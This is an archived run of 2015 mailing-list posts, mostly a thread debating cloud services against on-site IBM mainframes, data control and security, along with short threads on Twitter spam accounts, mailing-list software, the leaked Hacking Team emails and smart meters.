Sun Jul 19 02:34:39 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 19 Jul 2015 11:34:39 +0200 Subject: an ominous comment In-Reply-To: <877fpwmul1.fsf@mid.deneb.enyo.de> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150718151551.GA2439@sivokote.iziade.m$> <877fpwmul1.fsf@mid.deneb.enyo.de> Message-ID: <8078897.RstFYr029M@lapuntu> Dnia niedziela, 19 lipca 2015 10:15:38 Florian Weimer pisze: > * Georgi Guninski: > > You should be aware of the numerous virtualization > > sploits -- Xen, Qemu, possibly others. > > > > Exploiting a virtualization bug is just the fee > > "to be in cloud" and I _suspect_ more efforts > > are needed for my boxen. > > Not all service providers hand you the capability to run arbitrary > code to run VM exploits, so you have to exploit an application bug > first. (And the application may even run on bare metal.) > > Service providers can also provision VMs in such a way that customers > can only attack themselves. I consider service providers' access to my data a problem in and of itself. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From fw at deneb.enyo.de Sun Jul 19 04:21:41 2015 From: fw at deneb.enyo.de (Florian Weimer) Date: Sun, 19 Jul 2015 13:21:41 +0200 Subject: an ominous comment In-Reply-To: <8078897.RstFYr029M@lapuntu> (rysiek@hackerspace.pl's message of "Sun, 19 Jul 2015 11:34:39 +0200") References: <20150714155203.826F52282E2@palinka.tinho.net> <20150718151551.GA2439@sivokote.iziade.m$> <877fpwmul1.fsf@mid.deneb.enyo.de> <8078897.RstFYr029M@lapuntu> Message-ID: <874ml0gzp6.fsf@mid.deneb.enyo.de> > I consider service providers' access to my data a problem in and of itself. Sure, this is a valid position. But as we have seen, most organizations do a poor job of controlling their data in-house. Right now, an external service provider can often exceed quite easily the data controls such organizations can provide, and that alone might can make it a net win to move the data off premises. From guninski at guninski.com Sun Jul 19 06:54:45 2015 From: guninski at guninski.com (Georgi Guninski) Date: Sun, 19 Jul 2015 16:54:45 +0300 Subject: an ominous comment In-Reply-To: <877fpwmul1.fsf@mid.deneb.enyo.de> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <877fpwmul1.fsf@mid.deneb.enyo.de> Message-ID: <20150719135445.GA2524@sivokote.iziade.m$> On Sun, Jul 19, 2015 at 10:15:38AM +0200, Florian Weimer wrote: > * Georgi Guninski: > > > You should be aware of the numerous virtualization > > sploits -- Xen, Qemu, possibly others. > > > > Exploiting a virtualization bug is just the fee > > "to be in cloud" and I _suspect_ more efforts > > are needed for my boxen. > > Not all service providers hand you the capability to run arbitrary > code to run VM exploits, so you have to exploit an application bug > first. (And the application may even run on bare metal.) > > Service providers can also provision VMs in such a way that customers > can only attack themselves. Really? Isn't this too expensive for times of crisis like this? Anyway, me conjecture that there are plenty of bugs alive. From coderman at gmail.com Sun Jul 19 18:10:14 2015 From: coderman at gmail.com (coderman) Date: Sun, 19 Jul 2015 18:10:14 -0700 Subject: No subject Message-ID: joined the twitters recently, noticed that many of my posts attract "favorite'ers" who are honey pots. E.g.: - https://twitter.com/AudreySykestfm - https://twitter.com/EvelynHarri0pp - https://twitter.com/PenelopeRosap8 - https://twitter.com/AdalynEsteskul - https://twitter.com/PazhetnykhMiss - https://twitter.com/helensmithusacc - https://twitter.com/RubyFlemingdy5 - https://twitter.com/KaelynMorenm2g - https://twitter.com/PeytonKanee97 - https://twitter.com/LilyArnoldvkm maybe social research, or ... ? i guess they think i've got a type :P best regards, not interested codermange From juan.g71 at gmail.com Sun Jul 19 14:16:45 2015 From: juan.g71 at gmail.com (Juan) Date: Sun, 19 Jul 2015 18:16:45 -0300 Subject: an ominous comment In-Reply-To: <874ml0gzp6.fsf@mid.deneb.enyo.de> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150718151551.GA2439@sivokote.iziade.m$> <877fpwmul1.fsf@mid.deneb.enyo.de> <8078897.RstFYr029M@lapuntu> <874ml0gzp6.fsf@mid.deneb.enyo.de> Message-ID: <55ac1378.9a2a370a.978c9.5ddd@mx.google.com> On Sun, 19 Jul 2015 13:21:41 +0200 Florian Weimer wrote: > > I consider service providers' access to my data a problem in and of > > itself. > > Sure, this is a valid position. But as we have seen, most > organizations do a poor job of controlling their data in-house. Of course. People can't govern themselves or manage their own data. That's why we need jesus, google and the NSA. > Right > now, an external service provider can often exceed quite easily the > data controls such organizations can provide, and that alone might can > make it a net win to move the data off premises. From grarpamp at gmail.com Sun Jul 19 15:47:47 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 19 Jul 2015 18:47:47 -0400 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: References: <559cd699.c511370a.4f2c6.2444@mx.google.com> Message-ID: > They wanted their servants to keep them safe :) Don't get it twisted. From sdw at lig.net Sun Jul 19 18:58:18 2015 From: sdw at lig.net (Stephen Williams) Date: Sun, 19 Jul 2015 18:58:18 -0700 Subject: an ominous comment In-Reply-To: <20150720002516.GI27932@nl.grid.coop> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> Message-ID: <55AC55BA.4050603@lig.net> On 7/19/15 5:25 PM, Troy Benjegerdes wrote: > On Tue, Jul 14, 2015 at 11:52:03AM -0400, dan at geer.org wrote: >> Discussing security policy post-OPM debacle in a setting to which >> I have access (sorry to be oblique), it was said by a CxO "We have >> to prepare for the day when no software we depend on is run on >> premises." >> >> I did not handle this well (think sputtering as an alternative to >> white rage). At the same time, I am probably in a bubble in that >> I suspect that nearly everyone I see with a computer (of any form >> factor) is already in that situation or, save for Javascript piped >> in from the cloud to run locally, soon will be -- denizens of this >> list and a few others excepted. >> >> Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, >> perhaps, "Is anything to be done?" >> >> --dan > The same thing we did in the old days. > > Install an IBM mainframe. > > https://www.techwire.net/the-mainframe-lives-on-an-industry-perspective/ > > The only place the 'cloud' makes sense is if you are Amazon or Google > and you want to sell your excess computing capacity to suckers who can't > afford to buy their own computers. > > If you actually do capacity planning and maybe do something like apply > modern devops to mainframe platforms, you can actually get some economies > of scale running your mainframe on-site. > > It will probably cost less than what that CxO's got paid under-the-table > in a rigged altcoin pump-and-dump orchestrated by the cloud service > provider. Traditional corporate onsite compute, storage, network, security, software (Oracle etc.) is almost always extremely expensive. While a raw hard drive may be inexpensive, if you buy it in an EMC or mainframe storage array, you are going to pay many multiples more per GB, compute minute, etc. And, if you bought anything more than you actually use, you're being very wasteful. Parts of the cloud revolution are rapid just in time purchase, deployment, change, new scalable methods, etc., but economically, it is often tremendously less expensive than a commercial solution plus the support staff to make it work. In the most efficient traditional local deployment possible, this may not be true initially, but for the vast majority of mediocre corporate IT departments, it is very true. If you are large and/or savvy enough, the thing to do is to borrow cloud system methods and run a cloud for yourself. Currently, that's not completely easy or turnkey. At some point, we should get to a clean utility computing model, but it will take a few more generations of evolution. sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3279 bytes Desc: not available URL: From hozer at hozed.org Sun Jul 19 17:25:16 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Sun, 19 Jul 2015 19:25:16 -0500 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <20150720002516.GI27932@nl.grid.coop> On Tue, Jul 14, 2015 at 11:52:03AM -0400, dan at geer.org wrote: > Discussing security policy post-OPM debacle in a setting to which > I have access (sorry to be oblique), it was said by a CxO "We have > to prepare for the day when no software we depend on is run on > premises." > > I did not handle this well (think sputtering as an alternative to > white rage). At the same time, I am probably in a bubble in that > I suspect that nearly everyone I see with a computer (of any form > factor) is already in that situation or, save for Javascript piped > in from the cloud to run locally, soon will be -- denizens of this > list and a few others excepted. > > Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, > perhaps, "Is anything to be done?" > > --dan The same thing we did in the old days. Install an IBM mainframe. https://www.techwire.net/the-mainframe-lives-on-an-industry-perspective/ The only place the 'cloud' makes sense is if you are Amazon or Google and you want to sell your excess computing capacity to suckers who can't afford to buy their own computers. If you actually do capacity planning and maybe do something like apply modern devops to mainframe platforms, you can actually get some economies of scale running your mainframe on-site. It will probably cost less than what that CxO's got paid under-the-table in a rigged altcoin pump-and-dump orchestrated by the cloud service provider. From sdw at lig.net Sun Jul 19 19:53:35 2015 From: sdw at lig.net (Stephen Williams) Date: Sun, 19 Jul 2015 19:53:35 -0700 Subject: an ominous comment In-Reply-To: <20150720021318.GJ27932@nl.grid.coop> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> <55AC55BA.4050603@lig.net> <20150720021318.GJ27932@nl.grid.coop> Message-ID: <55AC62AF.1010904@lig.net> On 7/19/15 7:13 PM, Troy Benjegerdes wrote: > On Sun, Jul 19, 2015 at 06:58:18PM -0700, Stephen Williams wrote: >> .. >> If you are large and/or savvy enough, the thing to do is to borrow >> cloud system methods and run a cloud for yourself. Currently, >> that's not completely easy or turnkey. At some point, we should get >> to a clean utility computing model, but it will take a few more >> generations of evolution. >> >> sdw >> > IBM would tell you the z13 is the best platform to run a cloud on. > Claims are you get 8000 or so cloud servers per machine [1]. I'm > sure fujitsu or some other vendor will sell you something equally > expensive in the same 'mainframe' class that can virtualize like > that. > > A lot of what I hear about 'cloud' and virtualization are things that > were first deployed in 1970's-ish on mainframes. > > Now, you're absolutely right that a 1TB hard drive that has been > qualified to work with that machine will cost about 10x what you can > get at staples. It's 10x for the drive, another 10x for the box to put it in, another 10x for a license for the software to get to it, ... (Roughly. ;-) ) You can be nickle and dimed up front or over time. In the latter case, it will continue to get more competitive and begin to have local systems with the same characteristics. How much does an additional 4TB of storage for a z13 cost? > But the point about mainframes is they are built to have lots of > *memory bandwidth*, and a 'compute minute' on a Z13 is going to process > a lot more transactions and write them reliably to that overpriced > disk than any cloud solution is ever going to do. Most cloud systems fall into the embarrassingly parallel category. Many smaller, cheaper, cooler units completely outclass, in price and scalability, bigger, faster, higher bandwidth solutions, unless those are built inexpensively with smaller, cheaper, cooler units. We're finding out whether medium sized (Intel/AMD desktop / server class CPUs) or small (ARM mobile chipsets) are going to scale better, but either way, a many node system has an aggregate memory bandwidth that dwarfs old-style mega CPU systems. It's not clear, but it appears that the z13 is just an integrated cloud-style clustered system with a bunch of nice added features[2]. If so, which is the only way it could compete on scale and cost, it is a branded cloud system. Would it really be less expensive to operate than an Open Compute local cloud? Probably only if you made a lot of assumptions about overhead, etc. The z13 looks cool, and has a lot of interesting features. It will be interesting to see how it does. > You just have to be ready to write a check for a couple of million > if you want one of these things on-site, and that's why the cloud > exists, for the folks that either don't have that kind of money, or > don't understand why they should spend it up-front, instead of getting > nickel and dimed to death by cloud vendors and their hackers. If you have the type of business where you know what you need and how much of it you need, you can competitively provision a local solution, although there are still plenty of ways to go wrong. And many do, IMHO. Many businesses have relatively modest needs, don't know what their growth will look like, etc. Large up front costs are bad in a lot of situations, as is committing to a certain scale when there is a lot of uncertainty. The number of businesses and organizations who fit that narrow situation are few and dwindling. Sales will be able to rope in plenty more for a while, but for many it is not a sane choice. Security breaks are mostly about passwords, trojans, spear phishing, zombie machines, etc. For every possible exploit of a cloud system, which at the infrastructure level should have well-funded security, I feel there are many more gaps in the typical local alternative: Sloppy, old Windows systems with a sloppy network, open to everyone file servers, poor access control, terrible custom programming, no significant physical security, etc. The best systems + networks + policies + personnel are more secure, everyone else is just lucky not to be targeted. This covers some of this territory: https://news.ycombinator.com/item?id=2482123 > > [1] http://www.computerworld.com/article/2872096/ibm-s-z13-and-the-case-for-the-mainframe-cloud.html [2] https://www-03.ibm.com/press/us/en/pressrelease/45808.wss sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5864 bytes Desc: not available URL: From rysiek at hackerspace.pl Sun Jul 19 11:50:54 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 19 Jul 2015 20:50:54 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: <874ml0jyfo.fsf@mid.deneb.enyo.de> References: <874ml0jyfo.fsf@mid.deneb.enyo.de> Message-ID: <4359738.CeOcIvrTNq@lapuntu> Dnia niedziela, 19 lipca 2015 11:20:43 Florian Weimer pisze: > * eden: > > I'm an admin for a lot of groups. Those groups are run on Yahoo, > > > > Google, as well as some that are run on private mailman machines. The > > question keeps coming up... what is the alternative? > > Mailman 3? It is supposed to offer an interface which appeals more to > casual users not entirely comfortable with email, while at the same > time offering complete email integration. > > I've also seen Discourse instances which look quite useful, but I'm > not a regular user on such platforms to tell how it works out in > practice. Sympa worked pretty well for me also. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Sun Jul 19 11:54:37 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 19 Jul 2015 20:54:37 +0200 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: Message-ID: <1765623.m5QBTiy03s@lapuntu> Dnia czwartek, 9 lipca 2015 17:19:11 coderman pisze: > https://wikileaks.org/hackingteam/emails/emailid/144932 There's a bunch more of these, accessible via the very nice search interface: https://wikileaks.org/hackingteam/emails/?q=%22msz.gov.pl%22&mfrom=&mto=&title=¬itle=&date=&nofrom=¬o=&count=50&sort=0#searchresult By the way, does anybody know what this list is about? Customers? Blacklisted people? Targets? -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From odinn.cyberguerrilla at riseup.net Sun Jul 19 21:01:05 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Sun, 19 Jul 2015 21:01:05 -0700 Subject: an ominous comment In-Reply-To: <55AC62AF.1010904@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> <55AC55BA.4050603@lig.net> <20150720021318.GJ27932@nl.grid.coop> <55AC62AF.1010904@lig.net> Message-ID: <55AC7281.8090500@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 an ominous comment On 07/19/2015 07:53 PM, Stephen Williams wrote: > On 7/19/15 7:13 PM, Troy Benjegerdes wrote: >> On Sun, Jul 19, 2015 at 06:58:18PM -0700, Stephen Williams >> wrote: >>> .. If you are large and/or savvy enough, the thing to do is to >>> borrow cloud system methods and run a cloud for yourself. >>> Currently, that's not completely easy or turnkey. At some >>> point, we should get to a clean utility computing model, but it >>> will take a few more generations of evolution. >>> >>> sdw >>> >> IBM would tell you the z13 is the best platform to run a cloud >> on. Claims are you get 8000 or so cloud servers per machine [1]. >> I'm sure fujitsu or some other vendor will sell you something >> equally expensive in the same 'mainframe' class that can >> virtualize like that. >> >> A lot of what I hear about 'cloud' and virtualization are things >> that were first deployed in 1970's-ish on mainframes. >> >> Now, you're absolutely right that a 1TB hard drive that has been >> qualified to work with that machine will cost about 10x what you >> can get at staples. > > It's 10x for the drive, another 10x for the box to put it in, > another 10x for a license for the software to get to it, ... > (Roughly. ;-) ) You can be nickle and dimed up front or over time. > In the latter case, it will continue to get more competitive and > begin to have local systems with the same characteristics. > > How much does an additional 4TB of storage for a z13 cost? > >> But the point about mainframes is they are built to have lots of >> *memory bandwidth*, and a 'compute minute' on a Z13 is going to >> process a lot more transactions and write them reliably to that >> overpriced disk than any cloud solution is ever going to do. > > Most cloud systems fall into the embarrassingly parallel category. > Many smaller, cheaper, cooler units completely outclass, in price > and scalability, bigger, faster, higher bandwidth solutions, unless > those are built inexpensively with smaller, cheaper, cooler units. > We're finding out whether medium sized (Intel/AMD desktop / server > class CPUs) or small (ARM mobile chipsets) are going to scale > better, but either way, a many node system has an aggregate memory > bandwidth that dwarfs old-style mega CPU systems. It's not clear, > but it appears that the z13 is just an integrated cloud-style > clustered system with a bunch of nice added features[2]. If so, > which is the only way it could compete on scale and cost, it is a > branded cloud system. Would it really be less expensive to operate > than an Open Compute local cloud? Probably only if you made a lot > of assumptions about overhead, etc. > > The z13 looks cool, and has a lot of interesting features. It will > be interesting to see how it does. > >> You just have to be ready to write a check for a couple of >> million if you want one of these things on-site, and that's why >> the cloud exists, for the folks that either don't have that kind >> of money, or don't understand why they should spend it up-front, >> instead of getting nickel and dimed to death by cloud vendors and >> their hackers. > > If you have the type of business where you know what you need and > how much of it you need, you can competitively provision a local > solution, although there are still plenty of ways to go wrong. And > many do, IMHO. Many businesses have relatively modest needs, don't > know what their growth will look like, etc. Large up front costs > are bad in a lot of situations, as is committing to a certain scale > when there is a lot of uncertainty. > > The number of businesses and organizations who fit that narrow > situation are few and dwindling. Sales will be able to rope in > plenty more for a while, but for many it is not a sane choice. > Security breaks are mostly about passwords, trojans, spear > phishing, zombie machines, etc. For every possible exploit of a > cloud system, which at the infrastructure level should have > well-funded security, I feel there are many more gaps in the > typical local alternative: Sloppy, old Windows systems with a > sloppy network, open to everyone file servers, poor access > control, terrible custom programming, no significant physical > security, etc. The best systems + networks + policies + personnel > are more secure, everyone else is just lucky not to be targeted. > > This covers some of this territory: > https://news.ycombinator.com/item?id=2482123 > >> >> [1] >> http://www.computerworld.com/article/2872096/ibm-s-z13-and-the-case-f or-the-mainframe-cloud.html > >> > [2] https://www-03.ibm.com/press/us/en/pressrelease/45808.wss > > sdw > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVrHKBAAoJEGxwq/inSG8CT1kH/RNkbCsjWcyz+vvNnzi5rf/z oF8DdZq3ed+eDQGfu8QstUdIjQRJN3oHBXODF0JZmkBwMfuEQmUpel7x6olQf5fi BWKR+Eb3Y5tz/sopmAFohvpqtm6P8MFuRt98mK1Iv30AkF272Bme+NgIcGaVQupJ Z2mmrFrteScIV6jFdcp/gkTi8KwYUoCv3tz2vN14As3U6zFR+ZIokSXyel6ETiqO cxd/NYK01MgEHaNZFL5/6CcxDmFZ8drmjrN0ngUSSDCYMBGqb+5Sk6Widtw59Ucz gV7EKa39+dZGMUQszyuKq9ZJgI/5Zgw2TWFETTNO93dEO7+gjfvzwjJSPAh0lXo= =j/49 -----END PGP SIGNATURE----- From rysiek at hackerspace.pl Sun Jul 19 12:05:14 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 19 Jul 2015 21:05:14 +0200 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: Message-ID: <2289294.1hFPrSu5RT@lapuntu> Dnia niedziela, 5 lipca 2015 08:38:51 Seth pisze: > I use the term 'smart' in quotes because it is a goddamn propaganda term > and needs to be replaced in the popular culture as soon as possible with > something more apt and mocking, say 'evil-genius'. I will use the term > 'evil-genius' meters from now on. "surveilling meters"? -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From hozer at hozed.org Sun Jul 19 19:13:19 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Sun, 19 Jul 2015 21:13:19 -0500 Subject: an ominous comment In-Reply-To: <55AC55BA.4050603@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> <55AC55BA.4050603@lig.net> Message-ID: <20150720021318.GJ27932@nl.grid.coop> On Sun, Jul 19, 2015 at 06:58:18PM -0700, Stephen Williams wrote: > On 7/19/15 5:25 PM, Troy Benjegerdes wrote: > >On Tue, Jul 14, 2015 at 11:52:03AM -0400, dan at geer.org wrote: > >>Discussing security policy post-OPM debacle in a setting to which > >>I have access (sorry to be oblique), it was said by a CxO "We have > >>to prepare for the day when no software we depend on is run on > >>premises." > >> > >>I did not handle this well (think sputtering as an alternative to > >>white rage). At the same time, I am probably in a bubble in that > >>I suspect that nearly everyone I see with a computer (of any form > >>factor) is already in that situation or, save for Javascript piped > >>in from the cloud to run locally, soon will be -- denizens of this > >>list and a few others excepted. > >> > >>Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, > >>perhaps, "Is anything to be done?" > >> > >>--dan > >The same thing we did in the old days. > > > >Install an IBM mainframe. > > > >https://www.techwire.net/the-mainframe-lives-on-an-industry-perspective/ > > > >The only place the 'cloud' makes sense is if you are Amazon or Google > >and you want to sell your excess computing capacity to suckers who can't > >afford to buy their own computers. > > > >If you actually do capacity planning and maybe do something like apply > >modern devops to mainframe platforms, you can actually get some economies > >of scale running your mainframe on-site. > > > >It will probably cost less than what that CxO's got paid under-the-table > >in a rigged altcoin pump-and-dump orchestrated by the cloud service > >provider. > > Traditional corporate onsite compute, storage, network, security, > software (Oracle etc.) is almost always extremely expensive. While > a raw hard drive may be inexpensive, if you buy it in an EMC or > mainframe storage array, you are going to pay many multiples more > per GB, compute minute, etc. And, if you bought anything more than > you actually use, you're being very wasteful. Parts of the cloud > revolution are rapid just in time purchase, deployment, change, new > scalable methods, etc., but economically, it is often tremendously > less expensive than a commercial solution plus the support staff to > make it work. In the most efficient traditional local deployment > possible, this may not be true initially, but for the vast majority > of mediocre corporate IT departments, it is very true. > > If you are large and/or savvy enough, the thing to do is to borrow > cloud system methods and run a cloud for yourself. Currently, > that's not completely easy or turnkey. At some point, we should get > to a clean utility computing model, but it will take a few more > generations of evolution. > > sdw > IBM would tell you the z13 is the best platform to run a cloud on. Claims are you get 8000 or so cloud servers per machine [1]. I'm sure fujitsu or some other vendor will sell you something equally expensive in the same 'mainframe' class that can virtualize like that. A lot of what I hear about 'cloud' and virtualization are things that were first deployed in 1970's-ish on mainframes. Now, you're absolutely right that a 1TB hard drive that has been qualified to work with that machine will cost about 10x what you can get at staples. But the point about mainframes is they are built to have lots of *memory bandwidth*, and a 'compute minute' on a Z13 is going to process a lot more transactions and write them reliably to that overpriced disk than any cloud solution is ever going to do. You just have to be ready to write a check for a couple of million if you want one of these things on-site, and that's why the cloud exists, for the folks that either don't have that kind of money, or don't understand why they should spend it up-front, instead of getting nickel and dimed to death by cloud vendors and their hackers. [1] http://www.computerworld.com/article/2872096/ibm-s-z13-and-the-case-for-the-mainframe-cloud.html From coderman at gmail.com Sun Jul 19 22:31:42 2015 From: coderman at gmail.com (coderman) Date: Sun, 19 Jul 2015 22:31:42 -0700 Subject: In-Reply-To: <55AC5B26.8050100@pobox.com> References: <55AC5B26.8050100@pobox.com> Message-ID: does this taper off? or just a constant stream of noise... From coderman at gmail.com Sun Jul 19 23:35:32 2015 From: coderman at gmail.com (coderman) Date: Sun, 19 Jul 2015 23:35:32 -0700 Subject: In-Reply-To: <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> References: <55AC5B26.8050100@pobox.com> <1437373531.2379710.327896465.7A3C60EA@webmail.messagingengine.com> Message-ID: On 7/19/15, Alfie John wrote: > ... > They are mostly astroturfers, pinging every so often. Click report and > move on. i am currently collecting an image corpus... so i can automate the report. yeah, that's it. ;) From hozer at hozed.org Sun Jul 19 22:38:09 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Mon, 20 Jul 2015 00:38:09 -0500 Subject: an ominous comment In-Reply-To: <55AC7281.8090500@riseup.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> <55AC55BA.4050603@lig.net> <20150720021318.GJ27932@nl.grid.coop> <55AC62AF.1010904@lig.net> <55AC7281.8090500@riseup.net> Message-ID: <20150720053809.GK27932@nl.grid.coop> So the interesting (and ominous?) question is which costs less: 1 mainframe or: 10,000 distributed multi-terabyte hardrives to store 1 terabyte of blockchain, and all the hashing power needed to secure the blockhain from attackers who can afford mainframes? Second question: Are you pricing in dollars or cryptocoins, cause it seems to me you get divergent answers depending on which one you use. Third question: does the blockchain still work when it shuts down overnight because the distributed power source sets? Or does control revert to the owners of the centralized power plants? On Sun, Jul 19, 2015 at 09:01:05PM -0700, odinn wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > an ominous comment > > On 07/19/2015 07:53 PM, Stephen Williams wrote: > > On 7/19/15 7:13 PM, Troy Benjegerdes wrote: > >> On Sun, Jul 19, 2015 at 06:58:18PM -0700, Stephen Williams > >> wrote: > >>> .. If you are large and/or savvy enough, the thing to do is to > >>> borrow cloud system methods and run a cloud for yourself. > >>> Currently, that's not completely easy or turnkey. At some > >>> point, we should get to a clean utility computing model, but it > >>> will take a few more generations of evolution. > >>> > >>> sdw > >>> > >> IBM would tell you the z13 is the best platform to run a cloud > >> on. Claims are you get 8000 or so cloud servers per machine [1]. > >> I'm sure fujitsu or some other vendor will sell you something > >> equally expensive in the same 'mainframe' class that can > >> virtualize like that. > >> > >> A lot of what I hear about 'cloud' and virtualization are things > >> that were first deployed in 1970's-ish on mainframes. > >> > >> Now, you're absolutely right that a 1TB hard drive that has been > >> qualified to work with that machine will cost about 10x what you > >> can get at staples. > > > > It's 10x for the drive, another 10x for the box to put it in, > > another 10x for a license for the software to get to it, ... > > (Roughly. ;-) ) You can be nickle and dimed up front or over time. > > In the latter case, it will continue to get more competitive and > > begin to have local systems with the same characteristics. > > > > How much does an additional 4TB of storage for a z13 cost? > > > >> But the point about mainframes is they are built to have lots of > >> *memory bandwidth*, and a 'compute minute' on a Z13 is going to > >> process a lot more transactions and write them reliably to that > >> overpriced disk than any cloud solution is ever going to do. > > > > Most cloud systems fall into the embarrassingly parallel category. > > Many smaller, cheaper, cooler units completely outclass, in price > > and scalability, bigger, faster, higher bandwidth solutions, unless > > those are built inexpensively with smaller, cheaper, cooler units. > > We're finding out whether medium sized (Intel/AMD desktop / server > > class CPUs) or small (ARM mobile chipsets) are going to scale > > better, but either way, a many node system has an aggregate memory > > bandwidth that dwarfs old-style mega CPU systems. It's not clear, > > but it appears that the z13 is just an integrated cloud-style > > clustered system with a bunch of nice added features[2]. If so, > > which is the only way it could compete on scale and cost, it is a > > branded cloud system. Would it really be less expensive to operate > > than an Open Compute local cloud? Probably only if you made a lot > > of assumptions about overhead, etc. > > > > The z13 looks cool, and has a lot of interesting features. It will > > be interesting to see how it does. > > > >> You just have to be ready to write a check for a couple of > >> million if you want one of these things on-site, and that's why > >> the cloud exists, for the folks that either don't have that kind > >> of money, or don't understand why they should spend it up-front, > >> instead of getting nickel and dimed to death by cloud vendors and > >> their hackers. > > > > If you have the type of business where you know what you need and > > how much of it you need, you can competitively provision a local > > solution, although there are still plenty of ways to go wrong. And > > many do, IMHO. Many businesses have relatively modest needs, don't > > know what their growth will look like, etc. Large up front costs > > are bad in a lot of situations, as is committing to a certain scale > > when there is a lot of uncertainty. > > > > The number of businesses and organizations who fit that narrow > > situation are few and dwindling. Sales will be able to rope in > > plenty more for a while, but for many it is not a sane choice. > > Security breaks are mostly about passwords, trojans, spear > > phishing, zombie machines, etc. For every possible exploit of a > > cloud system, which at the infrastructure level should have > > well-funded security, I feel there are many more gaps in the > > typical local alternative: Sloppy, old Windows systems with a > > sloppy network, open to everyone file servers, poor access > > control, terrible custom programming, no significant physical > > security, etc. The best systems + networks + policies + personnel > > are more secure, everyone else is just lucky not to be targeted. > > > > This covers some of this territory: > > https://news.ycombinator.com/item?id=2482123 > > > >> > >> [1] > >> http://www.computerworld.com/article/2872096/ibm-s-z13-and-the-case-f > or-the-mainframe-cloud.html > > > >> > > [2] https://www-03.ibm.com/press/us/en/pressrelease/45808.wss > > > > sdw > > > > - -- > http://abis.io ~ > "a protocol concept to enable decentralization > and expansion of a giving economy, and a new social good" > https://keybase.io/odinn > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1 > > iQEcBAEBAgAGBQJVrHKBAAoJEGxwq/inSG8CT1kH/RNkbCsjWcyz+vvNnzi5rf/z > oF8DdZq3ed+eDQGfu8QstUdIjQRJN3oHBXODF0JZmkBwMfuEQmUpel7x6olQf5fi > BWKR+Eb3Y5tz/sopmAFohvpqtm6P8MFuRt98mK1Iv30AkF272Bme+NgIcGaVQupJ > Z2mmrFrteScIV6jFdcp/gkTi8KwYUoCv3tz2vN14As3U6zFR+ZIokSXyel6ETiqO > cxd/NYK01MgEHaNZFL5/6CcxDmFZ8drmjrN0ngUSSDCYMBGqb+5Sk6Widtw59Ucz > gV7EKa39+dZGMUQszyuKq9ZJgI/5Zgw2TWFETTNO93dEO7+gjfvzwjJSPAh0lXo= > =j/49 > -----END PGP SIGNATURE----- From cathalgarvey at cathalgarvey.me Mon Jul 20 01:32:51 2015 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Mon, 20 Jul 2015 09:32:51 +0100 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: <55ACB233.8020904@cathalgarvey.me> I happen to know someone personally who went to one of the largest social networks out there, and just asked if he could have full backend access to play around and go data mining. They didn't bat an eyelid and gave him access to the kind of data you don't get even from the paid API. This guy happens to be exceptionally convincing, but he wasn't being disingenuous; he literally just promised to fish around and see if he could find and visualise any cool stuff, and they opened up. So, no. Your data isn't remotely safe, not even a little bit. On 19/07/15 